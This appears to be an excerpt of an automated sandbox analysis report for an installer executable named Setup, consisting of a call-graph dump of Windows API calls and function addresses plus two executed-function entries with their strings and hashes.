80972->80973 80974 6394f24c 5 API calls 80973->80974 80975 6394f45c 80974->80975 80976 6394f24c 5 API calls 80975->80976 80977 6394f471 GetDlgItem GetWindowLongW 80976->80977 80978 6394f494 80977->80978 80979 6394f4b1 80978->80979 80980 6394f49f 80978->80980 80982 6394f4ca 80979->80982 80983 6394f4b5 80979->80983 80981 6394f4a3 80980->80981 80980->80982 81018 6394f527 7 API calls _wcsupr_s_l_stat 80981->81018 80988 639577a9 80982->80988 81019 6394f527 7 API calls _wcsupr_s_l_stat 80983->81019 80986 6394f4ad SetWindowLongW 80986->80982 80990 639577b4 SendMessageW 80988->80990 80991 639577da 80990->80991 81020 6394e389 GetParent PostMessageW 80991->81020 80993 639576a1 80993->80956 81021 6397265b 80994->81021 80996 6395fb5b GetParent SendMessageW 80997 6395fb95 80996->80997 80998 6395fb8a 80996->80998 81000 6395fba9 80997->81000 81023 6395ea8d 98 API calls ctype 80997->81023 81022 6395ea8d 98 API calls ctype 80998->81022 81002 6395fbc7 81000->81002 81003 6395fbb2 GetParent SendMessageW 81000->81003 81004 6395fbd0 GetParent SendMessageW 81002->81004 81005 6395fbe5 _receive_impl ctype 81002->81005 81003->81002 81004->81005 81005->80963 81006->80938 81007->80943 81008->80954 81009->80957 81010->80944 81012 6394f266 81011->81012 81013 6394f2a2 ShowWindow 81012->81013 81016 6394f26a SetWindowTextW ShowWindow 81012->81016 81014 6394f2ad KiUserCallbackDispatcher 81013->81014 81014->80971 81017 6394f29c 81016->81017 81017->81014 81018->80986 81019->80986 81020->80993 81021->80996 81022->80997 81023->81000 81024 6395df19 81031 6395ca5a 81024->81031 81028 6395df6c GetExitCodeThread CloseHandle 81037 6395cb21 74 API calls 4 library calls 81028->81037 81030 6395df9b 81038 639509a7 LoadLibraryW 81031->81038 81033 6395ca98 81039 639565d7 InitCommonControlsEx 81033->81039 81035 6395cb14 CreateThread 81036 639603f5 MsgWaitForMultipleObjects PeekMessageW TranslateMessage DispatchMessageW PeekMessageW 81035->81036 81040 6395dfab 8 API calls 81035->81040 81036->81028 81037->81030 81038->81033 81039->81035 81041 6c90ff5c EnterCriticalSection 81042 6c9108fc LeaveCriticalSection 81041->81042 81043 6c90ffae 81041->81043 81044 6c8c4cb2 112 API calls 81043->81044 81045 6c90ffbb 81044->81045 81046 6c8f833e ctype 110 API calls 81045->81046 81047 6c90ffd3 81046->81047 81048 6c8f8cd5 ctype 101 API calls 81047->81048 81049 6c90ffee 81048->81049 81050 6c8c391d 110 API calls 81049->81050 81057 6c910017 81050->81057 81051 6c91009e 81052 6c91c0aa ctype 77 API calls 81051->81052 81053 6c9100a5 81052->81053 81056 6c91c0aa ctype 77 API calls 81053->81056 81054 6c91c0aa ctype 77 API calls 81054->81057 81055 6c8e24cd 111 API calls 81055->81057 81059 6c9100d6 81056->81059 81057->81051 81057->81054 81057->81055 81095 6c912306 81057->81095 81115 6c8fbc6d 71 API calls 2 library calls 81057->81115 81099 6c912480 81059->81099 81062 6c9108a0 81063 6c90657a ctype 67 API calls 81062->81063 81065 6c9108b1 81063->81065 81064 6c918e54 ctype KiUserExceptionDispatcher 81081 6c910133 81064->81081 81107 6c9124d1 81065->81107 81067 6c8e24cd 111 API calls 81067->81081 81069 6c8c395e ctype 101 API calls 81070 6c9108d8 81069->81070 81071 6c918f0e ctype RtlFreeHeap 81070->81071 81072 6c9108e4 81071->81072 81074 6c918f0e ctype RtlFreeHeap 81072->81074 81073 6c9268b5 67 API calls ctype 81073->81081 81075 6c9108f0 81074->81075 81076 6c918f0e ctype RtlFreeHeap 81075->81076 81076->81042 81078 6c8fbc09 CloseHandle ctype 81078->81081 81079 6c910924 81120 6c9178c8 RaiseException 81079->81120 81081->81062 81081->81064 81081->81067 81081->81073 81081->81078 81081->81079 81083 6c914ee6 71 API calls 81081->81083 81084 6c8d6cb7 110 API calls 81081->81084 81085 6c8c3834 76 API calls 81081->81085 81086 6c914c0c 175 API calls 81081->81086 81089 6c912306 175 API calls 81081->81089 81090 6c918eab 67 API calls ctype 81081->81090 81092 6c8f84b9 101 API calls ctype 81081->81092 81093 6c918f0e RtlFreeHeap ctype 81081->81093 81094 6c8f9067 ctype 71 API calls 81081->81094 81116 6c8f8f9e 71 API calls ctype 81081->81116 81117 6c8f902f KiUserExceptionDispatcher ctype 81081->81117 81118 6c8df454 115 API calls 4 library calls 81081->81118 81119 6c8dd25c 111 API calls 4 library calls 81081->81119 81082 6c910929 81083->81081 81084->81081 81085->81081 81086->81081 81089->81081 81090->81081 81092->81081 81093->81081 81094->81081 81096 6c912312 __EH_prolog3 81095->81096 81121 6c914c71 81096->81121 81098 6c912356 ctype 81098->81057 81101 6c912489 81099->81101 81106 6c9124b3 81099->81106 81100 6c9124a9 81103 6c91be0e _free 66 API calls 81100->81103 81101->81100 81105 6c918f0e ctype RtlFreeHeap 81101->81105 81102 6c91be0e _free 66 API calls 81104 6c9124c3 81102->81104 81103->81106 81104->81081 81105->81101 81106->81102 81106->81104 81374 6c91236b 81107->81374 81111 6c9108bf 81111->81069 81112 6c8e24cd 111 API calls 81114 6c9124ee 81112->81114 81113 6c91be92 70 API calls __recalloc 81113->81114 81114->81111 81114->81112 81114->81113 81115->81057 81116->81081 81117->81081 81118->81081 81119->81081 81120->81082 81122 6c914cc1 81121->81122 81135 6c914c88 81121->81135 81123 6c914cc6 81122->81123 81124 6c914cdd 81122->81124 81207 6c915748 175 API calls ctype 81123->81207 81128 6c914ce2 81124->81128 81129 6c914cf9 81124->81129 81125 6c914cbf 81126 6c914d29 81125->81126 81209 6c9155d7 175 API calls ctype 81125->81209 81126->81098 81208 6c915668 175 API calls ctype 81128->81208 81136 6c91537a 81129->81136 81133 6c914c71 175 API calls 81133->81135 81135->81125 81135->81133 81206 6c8dd25c 111 API calls 4 library calls 81135->81206 81137 6c915386 __EH_prolog3 81136->81137 81138 6c8f833e ctype 110 API calls 81137->81138 81139 6c915394 81138->81139 81140 6c9268b5 ctype 67 API calls 81139->81140 81141 6c9153ae 81140->81141 81142 6c9268b5 ctype 67 API calls 81141->81142 81143 6c9153c3 81142->81143 81144 6c915414 81143->81144 81145 6c9153cd 81143->81145 81147 6c91543b 81144->81147 81249 6c8e0b24 67 API calls ctype 81144->81249 81146 6c8d6cb7 110 API calls 81145->81146 81148 6c9153d8 81146->81148 81149 6c9268b5 ctype 67 API calls 81147->81149 81151 6c918eab ctype 67 API calls 81148->81151 81152 6c91544d 81149->81152 81154 6c9153e6 81151->81154 81155 6c915412 81152->81155 81159 6c8f84b9 ctype 101 API calls 81152->81159 81153 6c915420 81156 6c8f84b9 ctype 101 API calls 81153->81156 81158 6c8f84b9 ctype 101 API calls 81154->81158 81160 6c8f8cd5 ctype 101 API calls 81155->81160 81157 6c91542c 81156->81157 81161 6c918f0e ctype RtlFreeHeap 81157->81161 81162 6c9153fb 81158->81162 81159->81155 81163 6c915473 81160->81163 81161->81147 81164 6c918f0e ctype RtlFreeHeap 81162->81164 81165 6c8f8cd5 ctype 101 API calls 81163->81165 81166 6c915403 81164->81166 81167 6c915481 81165->81167 81168 6c918f0e ctype RtlFreeHeap 81166->81168 81169 6c8c391d 110 API calls 81167->81169 81168->81155 81170 6c91549d 81169->81170 81171 6c918f0e ctype RtlFreeHeap 81170->81171 81172 6c9154ac 81171->81172 81173 6c9155b8 81172->81173 81174 6c9268b5 ctype 67 API calls 81172->81174 81215 6c9159f8 81173->81215 81177 6c9154ca 81174->81177 81176 6c91558c 81179 6c8c395e ctype 101 API calls 81176->81179 81182 6c9154df 81177->81182 81210 6c915b5d 81177->81210 81181 6c91559b 81179->81181 81184 6c918f0e ctype RtlFreeHeap 81181->81184 81188 6c8fff21 ctype 101 API calls 81182->81188 81183 6c915539 81185 6c915540 81183->81185 81186 6c91554a 81183->81186 81187 6c9155a6 81184->81187 81250 6c8e0b4a 119 API calls 3 library calls 81185->81250 81190 6c9268b5 ctype 67 API calls 81186->81190 81191 6c918f0e ctype RtlFreeHeap 81187->81191 81193 6c9154ee 81188->81193 81194 6c91555a 81190->81194 81200 6c915511 ctype 81191->81200 81192 6c915548 81197 6c90657a ctype 67 API calls 81192->81197 81195 6c8c395e ctype 101 API calls 81193->81195 81194->81173 81251 6c8e17a5 72 API calls 81194->81251 81198 6c9154fb 81195->81198 81199 6c915579 81197->81199 81201 6c918f0e ctype RtlFreeHeap 81198->81201 81199->81173 81202 6c91557d 81199->81202 81200->81125 81203 6c915506 81201->81203 81204 6c8fff21 ctype 101 API calls 81202->81204 81205 6c918f0e ctype RtlFreeHeap 81203->81205 81204->81176 81205->81200 81206->81135 81207->81125 81208->81125 81209->81126 81211 6c9268b5 ctype 67 API calls 81210->81211 81212 6c915b7b 81211->81212 81213 6c9268b5 ctype 67 API calls 81212->81213 81214 6c915529 81212->81214 81213->81214 81214->81182 81214->81183 81216 6c915a04 __EH_prolog3 81215->81216 81217 6c9268b5 ctype 67 API calls 81216->81217 81218 6c915a19 81217->81218 81219 6c915a2a 81218->81219 81220 6c9268b5 ctype 67 API calls 81218->81220 81221 6c8fff21 ctype 101 API calls 81219->81221 81222 6c915a52 GetCommandLineW 81220->81222 81227 6c915a39 ctype 81221->81227 81224 6c8c3e77 ctype 114 API calls 81222->81224 81225 6c915a74 81224->81225 81226 6c8c4486 ctype 112 API calls 81225->81226 81228 6c915a82 81226->81228 81227->81176 81252 6c912b01 81228->81252 81231 6c918f0e ctype RtlFreeHeap 81232 6c915aaa 81231->81232 81233 6c8c41a9 ctype 67 API calls 81232->81233 81234 6c915ab6 81233->81234 81235 6c915af6 81234->81235 81236 6c915abb 81234->81236 81368 6c915be8 68 API calls ctype 81235->81368 81236->81219 81241 6c915ad7 81236->81241 81238 6c915afc 81239 6c915b00 81238->81239 81240 6c915b13 81238->81240 81242 6c8fff21 ctype 101 API calls 81239->81242 81243 6c8f833e ctype 110 API calls 81240->81243 81244 6c8fff21 ctype 101 API calls 81241->81244 81242->81227 81245 6c915b21 81243->81245 81244->81227 81246 6c8fff21 ctype 101 API calls 81245->81246 81247 6c915b37 81246->81247 81248 6c918f0e ctype RtlFreeHeap 81247->81248 81248->81227 81249->81153 81250->81192 81251->81192 81253 6c912b3f 81252->81253 81293 6c912b38 81252->81293 81254 6c9268b5 ctype 67 API calls 81253->81254 81255 6c912b52 81254->81255 81256 6c9268b5 ctype 67 API calls 81255->81256 81255->81293 81257 6c912b6e 81256->81257 81258 6c9268b5 ctype 67 API calls 81257->81258 81257->81293 81259 6c912b83 81258->81259 81260 6c9268b5 ctype 67 API calls 81259->81260 81259->81293 81261 6c912b9c 81260->81261 81262 6c912bc4 GetCommandLineW 81261->81262 81278 6c912bee 81261->81278 81261->81293 81263 6c8c3e77 ctype 114 API calls 81262->81263 81264 6c912bd5 81263->81264 81369 6c8c423c 111 API calls ctype 81264->81369 81265 6c912c06 81267 6c8d6cb7 110 API calls 81265->81267 81270 6c912c14 PathFileExistsW 81267->81270 81268 6c912f1c 81271 6c8d6cb7 110 API calls 81268->81271 81269 6c912bde 81273 6c8c41a9 ctype 67 API calls 81269->81273 81274 6c918f0e ctype RtlFreeHeap 81270->81274 81275 6c912f2a 81271->81275 81272 6c912dad 81272->81268 81276 6c912df5 GetModuleFileNameW 81272->81276 81277 6c912dab 81272->81277 81273->81278 81279 6c912c28 81274->81279 81280 6c918eab ctype 67 API calls 81275->81280 81282 6c918afc ctype KiUserExceptionDispatcher 81276->81282 81277->81272 81281 6c918d3a ctype 70 API calls 81277->81281 81278->81265 81278->81272 81278->81293 81279->81272 81286 6c9268b5 ctype 67 API calls 81279->81286 81283 6c912f3a PathFileExistsW 81280->81283 81284 6c912df1 81281->81284 81285 6c912e0b 81282->81285 81287 6c918f0e ctype RtlFreeHeap 81283->81287 81284->81276 81289 6c8f833e ctype 110 API calls 81285->81289 81290 6c912c42 81286->81290 81288 6c912f51 81287->81288 81291 6c918f0e ctype RtlFreeHeap 81288->81291 81292 6c912e16 81289->81292 81290->81272 81295 6c8d6cb7 110 API calls 81290->81295 81291->81293 81294 6c8f8f73 ctype 71 API calls 81292->81294 81293->81231 81297 6c912e24 81294->81297 81296 6c912c5d 81295->81296 81370 6c8d6cd8 110 API calls ctype 81296->81370 81299 6c918eab ctype 67 API calls 81297->81299 81301 6c912e30 81299->81301 81300 6c912c73 81302 6c918eab ctype 67 API calls 81300->81302 81303 6c8f84b9 ctype 101 API calls 81301->81303 81304 6c912c82 81302->81304 81305 6c912e49 81303->81305 81306 6c918f0e ctype RtlFreeHeap 81304->81306 81307 6c918f0e ctype RtlFreeHeap 81305->81307 81309 6c912c9a 81306->81309 81308 6c912e56 81307->81308 81310 6c8d6cb7 110 API calls 81308->81310 81311 6c8e2d73 67 API calls 81309->81311 81312 6c912e64 81310->81312 81313 6c912ca5 81311->81313 81314 6c918eab ctype 67 API calls 81312->81314 81371 6c8e816f 67 API calls ctype 81313->81371 81316 6c912e73 81314->81316 81318 6c918f0e ctype RtlFreeHeap 81316->81318 81317 6c912cc9 81319 6c918f0e ctype RtlFreeHeap 81317->81319 81320 6c912e8b 81318->81320 81321 6c912cda 81319->81321 81322 6c8f89f0 ctype 67 API calls 81320->81322 81372 6c8e81ac 156 API calls 2 library calls 81321->81372 81324 6c912e9c 81322->81324 81326 6c8f84b9 ctype 101 API calls 81324->81326 81325 6c912ce1 81327 6c912d25 81325->81327 81328 6c912ce5 81325->81328 81332 6c912eaa 81326->81332 81330 6c912d6d 81327->81330 81331 6c912d2f 81327->81331 81329 6c8c39ad ctype RtlFreeHeap 81328->81329 81333 6c912cfd 81329->81333 81334 6c8c39ad ctype RtlFreeHeap 81330->81334 81335 6c8d6cb7 110 API calls 81331->81335 81336 6c918f0e ctype RtlFreeHeap 81332->81336 81337 6c918f0e ctype RtlFreeHeap 81333->81337 81338 6c912d68 81334->81338 81339 6c912d39 81335->81339 81340 6c912ebb 81336->81340 81341 6c912d0c 81337->81341 81345 6c918f0e ctype RtlFreeHeap 81338->81345 81373 6c8e8704 CreateFileW RtlFreeHeap ctype 81339->81373 81343 6c8f8c24 ctype 101 API calls 81340->81343 81344 6c918f0e ctype RtlFreeHeap 81341->81344 81347 6c912ecc PathFileExistsW 81343->81347 81348 6c912d14 81344->81348 81349 6c912d8e 81345->81349 81346 6c912d44 81350 6c918f0e ctype RtlFreeHeap 81346->81350 81351 6c918f0e ctype RtlFreeHeap 81347->81351 81353 6c918f0e ctype RtlFreeHeap 81348->81353 81354 6c918f0e ctype RtlFreeHeap 81349->81354 81355 6c912d52 81350->81355 81352 6c912ede 81351->81352 81356 6c918f0e ctype RtlFreeHeap 81352->81356 81357 6c912d20 81353->81357 81358 6c912d9a 81354->81358 81355->81338 81359 6c912d61 CloseHandle 81355->81359 81360 6c912eea 81356->81360 81357->81293 81361 6c918f0e ctype RtlFreeHeap 81358->81361 81359->81338 81362 6c918f0e ctype RtlFreeHeap 81360->81362 81361->81277 81363 6c912ef6 81362->81363 81364 6c912f0b 81363->81364 81365 6c912efa 81363->81365 81367 6c918f0e ctype RtlFreeHeap 81364->81367 81366 6c918f0e ctype RtlFreeHeap 81365->81366 81366->81357 81367->81268 81368->81238 81369->81269 81370->81300 81371->81317 81372->81325 81373->81346 81375 6c912371 81374->81375 81378 6c912377 81374->81378 81376 6c91be0e _free 66 API calls 81375->81376 81376->81378 81377 6c91be0e _free 66 API calls 81379 6c912388 81377->81379 81378->81377 81378->81379 81380 6c912397 81379->81380 81381 6c9123a0 81380->81381 81382 6c9123c9 81380->81382 81384 6c91be0e _free 66 API calls 81381->81384 81383 6c9123da 81382->81383 81385 6c91be0e _free 66 API calls 81382->81385 81383->81114 81384->81382 81385->81383 81386 6394ff39 GetWindowPlacement 81387 6394ff87 81386->81387 81388 6394ff9d 81386->81388 81394 639676ee 67 API calls 2 library calls 81387->81394 81391 639687c1 _wcsupr_s_l_stat 5 API calls 81388->81391 81390 6394ff8f 81390->81388 81395 639683ce RaiseException ctype __CxxThrowException@8 81390->81395 81392 6394ffc5 81391->81392 81394->81390 81396 292a24 81443 293db0 81396->81443 81398 292a30 GetStartupInfoW 81399 292a44 HeapSetInformation 81398->81399 81401 292a4f 81398->81401 81399->81401 81444 293d83 HeapCreate 81401->81444 81402 292a9d 81403 292aa8 81402->81403 81450 2929f6 65 API calls 3 library calls 81402->81450 81451 293c03 84 API calls 4 library calls 81403->81451 81406 292aae 81407 292aba __RTC_Initialize 81406->81407 81408 292ab2 81406->81408 81445 293642 72 API calls __calloc_crt 81407->81445 81452 2929f6 65 API calls 3 library calls 81408->81452 81410 292ab9 81410->81407 81412 292ac7 81413 292acb 81412->81413 81414 292ad3 GetCommandLineW 81412->81414 81453 292f1c 65 API calls 3 library calls 81413->81453 81446 2935e5 67 API calls 2 library calls 81414->81446 81417 292ae3 81454 293532 66 API calls 2 library calls 81417->81454 81420 292aed 81421 292af9 81420->81421 81422 292af1 81420->81422 81447 2932f6 65 API calls 5 library calls 81421->81447 81455 292f1c 65 API calls 3 library calls 81422->81455 81426 292afe 81427 292b0a 81426->81427 81428 292b02 81426->81428 81448 292cdd 74 API calls 4 library calls 81427->81448 81456 292f1c 65 API calls 3 library calls 81428->81456 81432 292b11 81433 292b16 81432->81433 81436 292b1d __wwincmdln 81432->81436 81457 292f1c 65 API calls 3 library calls 81433->81457 81435 292b1c 81435->81436 81436->81435 81449 292915 HeapSetInformation Run 81436->81449 81438 292b3e 81439 292b4c 81438->81439 81458 292ebe 65 API calls _doexit 81438->81458 81459 292ef4 65 API calls _doexit 81439->81459 81442 292b51 _doexit 81443->81398 81444->81402 81445->81412 81446->81417 81447->81426 81448->81432 81449->81438 81450->81403 81451->81406 81452->81410 81454->81420 81458->81439 81459->81442 81460 6395bc2b 81461 6395bc36 81460->81461 81463 6395bc3b 81460->81463 81499 6394e7d4 GetThreadLocale GetThreadLocale 81461->81499 81473 6395bc51 81463->81473 81474 63967d78 EnterCriticalSection 81463->81474 81465 6395bc6f 81466 6394e2e1 2 API calls 81465->81466 81467 6395bc84 81466->81467 81468 6395bc9b 81467->81468 81469 6395bc88 SetWindowLongW 81467->81469 81478 639642e3 81468->81478 81469->81468 81475 63967d95 GetCurrentThreadId 81474->81475 81476 63967dc0 LeaveCriticalSection 81474->81476 81477 63967d9d 81475->81477 81476->81465 81477->81476 81479 639642f5 81478->81479 81480 6395bca6 81478->81480 81500 63968e26 66 API calls 2 library calls 81479->81500 81482 6395bcbb 81480->81482 81483 6395bcc7 __EH_prolog3 81482->81483 81501 63961dcd 81483->81501 81485 6395bccc 81486 6395bcd0 SendMessageW GetSystemMenu EnableMenuItem 81485->81486 81487 6395bcff GetWindowLongW SetWindowLongW GetSystemMenu 81485->81487 81489 6395bdf0 SetWindowLongW SetWindowLongW 81486->81489 81488 6395e8e8 ctype 107 API calls 81487->81488 81490 6395bd38 InsertMenuW 81488->81490 81491 6395be21 _receive_impl 81489->81491 81493 6395bd70 ctype 81490->81493 81491->81473 81494 6395e8e8 ctype 107 API calls 81493->81494 81495 6395bd7e InsertMenuW 81494->81495 81510 63968460 81495->81510 81499->81463 81500->81480 81512 6397265b 81501->81512 81503 63961dd9 GetCommandLineW 81504 6394be03 111 API calls 81503->81504 81505 63961dea 81504->81505 81506 6394b9a7 108 API calls 81505->81506 81507 63961dfe 81506->81507 81508 6394c137 ctype 66 API calls 81507->81508 81509 63961e08 _receive_impl 81508->81509 81509->81485 81511 6395bdb2 InsertMenuW SetMenuItemBitmaps SetMenuItemBitmaps KiUserCallbackDispatcher 81510->81511 81511->81489 81512->81503 81513 63968789 81514 63968794 81513->81514 81515 63968799 81513->81515 81527 6396ada3 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 81514->81527 81519 6396868e 81515->81519 81518 639687a7 81520 6396869a __commit 81519->81520 81524 639686e7 ___DllMainCRTStartup 81520->81524 81525 63968737 __commit 81520->81525 81528 63968525 81520->81528 81522 63968717 81523 63968525 __CRT_INIT@12 149 API calls 81522->81523 81522->81525 81523->81525 81524->81522 81524->81525 81526 63968525 __CRT_INIT@12 149 API calls 81524->81526 81525->81518 81526->81522 81527->81515 81529 63968531 __commit 81528->81529 81530 639685b3 81529->81530 81531 63968539 81529->81531 81533 63968614 81530->81533 81534 639685b9 81530->81534 81580 6396a9e5 HeapCreate 81531->81580 81535 63968672 81533->81535 81536 63968619 81533->81536 81538 63968542 __commit 81534->81538 81541 639685d7 81534->81541 81590 6396a2da 66 API calls _doexit 81534->81590 81535->81538 81599 63969d33 79 API calls __freefls@4 81535->81599 81595 63969a2e TlsGetValue _DecodePointerInternal TlsSetValue 81536->81595 81537 6396853e 81537->81538 81540 63968549 81537->81540 81538->81524 81581 63969da6 86 API calls 5 library calls 81540->81581 81546 639685eb 81541->81546 81591 6396a55b 67 API calls __setenvp 81541->81591 81543 6396861e 81596 63969f70 66 API calls __calloc_crt 81543->81596 81594 639685fe 70 API calls __mtterm 81546->81594 81549 6396854e __RTC_Initialize 81553 63968552 81549->81553 81559 6396855e GetCommandLineA 81549->81559 81551 639685e1 81592 63969a67 70 API calls __setenvp 81551->81592 81552 6396862a 81552->81538 81555 63968636 _DecodePointerInternal 81552->81555 81582 6396aa08 HeapDestroy 81553->81582 81562 6396864b 81555->81562 81557 63968557 81557->81538 81558 639685e6 81593 6396aa08 HeapDestroy 81558->81593 81583 6396a8f3 71 API calls 2 library calls 81559->81583 81563 63968666 81562->81563 81564 6396864f 81562->81564 81598 63968e26 66 API calls 2 library calls 81563->81598 81597 63969aa9 66 API calls 4 library calls 81564->81597 81565 6396856e 81584 6396a311 73 API calls __calloc_crt 81565->81584 81569 63968656 GetCurrentThreadId 81569->81538 81570 63968578 81571 6396857c 81570->81571 81586 6396a833 95 API calls 3 library calls 81570->81586 81585 63969a67 70 API calls __setenvp 81571->81585 81574 63968588 81575 6396859c 81574->81575 81587 6396a5b3 94 API calls 6 library calls 81574->81587 81575->81557 81589 6396a55b 67 API calls __setenvp 81575->81589 81578 63968591 81578->81575 81588 6396a0de 77 API calls 4 library calls 81578->81588 81580->81537 81581->81549 81582->81557 81583->81565 81584->81570 81585->81553 81586->81574 81587->81578 81588->81575 81589->81571 81590->81541 81591->81551 81592->81558 81593->81546 81594->81538 81595->81543 81596->81552 81597->81569 81598->81557 81599->81538 81600 6395698a 81601 63956996 81600->81601 81602 639569c2 81600->81602 81601->81602 81603 6395699c ReadFile 81601->81603 81603->81602 81604 639569bd 81603->81604 81606 63967f08 GetLastError 81604->81606 81606->81602

                                                                                              Executed Functions

                                                                                              Function 6C900C91 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 247COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1828 6c900c91-6c900cb5 call 6c926e8d GetModuleHandleW 1831 6c900cb7-6c900ce5 call 6c8f833e GetLastError call 6c901236 1828->1831 1832 6c900cea-6c900cfb 1828->1832 1841 6c901007-6c901014 call 6c918f0e call 6c926f1f 1831->1841 1837 6c900d03-6c900db0 GetNativeSystemInfo call 6c8c4e07 call 6c8cc5d4 call 6c918f0e call 6c8f833e call 6c901236 call 6c918f0e call 6c8c4fd5 1832->1837 1838 6c900cfd 1832->1838 1860 6c900db2-6c900dba GetLastError 1837->1860 1861 6c900dca 1837->1861 1838->1837 1863 6c900dc6-6c900dc8 1860->1863 1864 6c900dbc-6c900dc1 1860->1864 1862 6c900dcc-6c900e13 call 6c8f833e call 6c901236 call 6c918f0e call 6c8c4fac 1861->1862 1873 6c900e15-6c900e17 1862->1873 1874 6c900e19 1862->1874 1863->1862 1864->1863 1875 6c900e20-6c900e36 1873->1875 1874->1875 1877 6c900e50 1875->1877 1878 6c900e38-6c900e40 GetLastError 1875->1878 1881 6c900e52-6c900e9d call 6c8f833e call 6c901236 call 6c918f0e 1877->1881 1879 6c900e42-6c900e47 1878->1879 1880 6c900e4c-6c900e4e 1878->1880 1879->1880 1880->1881 1890 6c900eb7 1881->1890 1891 6c900e9f-6c900ea7 GetLastError 1881->1891 1892 6c900eb9-6c900f5d call 6c8f833e call 6c901236 call 6c918f0e call 6c91e770 call 6c8c4fac call 6c8c5727 call 6c90356c 1890->1892 1893 6c900eb3-6c900eb5 1891->1893 1894 6c900ea9-6c900eae 1891->1894 1910 6c900f77 1892->1910 1911 6c900f5f-6c900f67 GetLastError 1892->1911 1893->1892 1894->1893 1914 6c900f79-6c900fb4 call 6c8f833e call 6c901236 call 6c918f0e call 6c8c712b 1910->1914 1912 6c900f73-6c900f75 1911->1912 1913 6c900f69-6c900f6e 1911->1913 1912->1914 1913->1912 1922 6c900fb9-6c901001 call 6c8cc5d4 call 6c918f0e call 6c8f833e call 6c901236 1914->1922 1922->1841
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C900C9B
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000029C,6C8FA587,?,6C8BA794,?,02F92298,?,00000000,?,Failed to record current state name), ref: 6C900CAD
                                                                                              • GetLastError.KERNEL32(?,Failed to record OSFullBuildNumber), ref: 6C900CCC
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C900D21
                                                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C900DB2
                                                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSAbbr,?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C900E38
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3$H_prolog3_HandleInfoModuleNativeSystem
                                                                                              • String ID: Failed to record OSAbbr$Failed to record OSComplete$Failed to record OSFullBuildNumber$Failed to record OsSpLevel$Failed to record SystemLocale$Failed to record WindowsInstallerVersion$GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 684166175-3561000745
                                                                                              • Opcode ID: 3bbb068833b15243b4e82454f118f7927e27fa42899b983bf0118e86805f0f12
                                                                                              • Instruction ID: c218f9e121144f35bbb4e008898a92f9c319b5007b3c115dd52e94b4ce01e9e3
                                                                                              • Opcode Fuzzy Hash: 3bbb068833b15243b4e82454f118f7927e27fa42899b983bf0118e86805f0f12
                                                                                              • Instruction Fuzzy Hash: 7EA1C831A00259AFDB20DBA4CE09BDDB7B9AF9530CF1045D8E004E7B41DB74EA89DB65
                                                                                              Function 6C8F76A7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 99libraryloaderthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F76AE
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C8FF845,?), ref: 6C8F7748
                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C8F7758
                                                                                              • SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C8F776D
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(6C90416A), ref: 6C8F7774
                                                                                              • GetCommandLineW.KERNEL32 ref: 6C8F777A
                                                                                                • Part of subcall function 6C8C7C6E: __EH_prolog3.LIBCMT ref: 6C8C7C75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$AddressCommandExceptionFilterGuaranteeHandleLineModuleProcStackThreadUnhandled_malloc
                                                                                              • String ID: SetThreadStackGuarantee$kernel32.dll$passive
                                                                                              • API String ID: 4088884676-825548933
                                                                                              • Opcode ID: 3cead472af1c5963832205292b00c165239845dbc5e9ec00099a8ea4bb333688
                                                                                              • Instruction ID: 349ebb142b5ab70b752ebd4b4f83630bfc46fc6692f2cd67fb088f472805b917
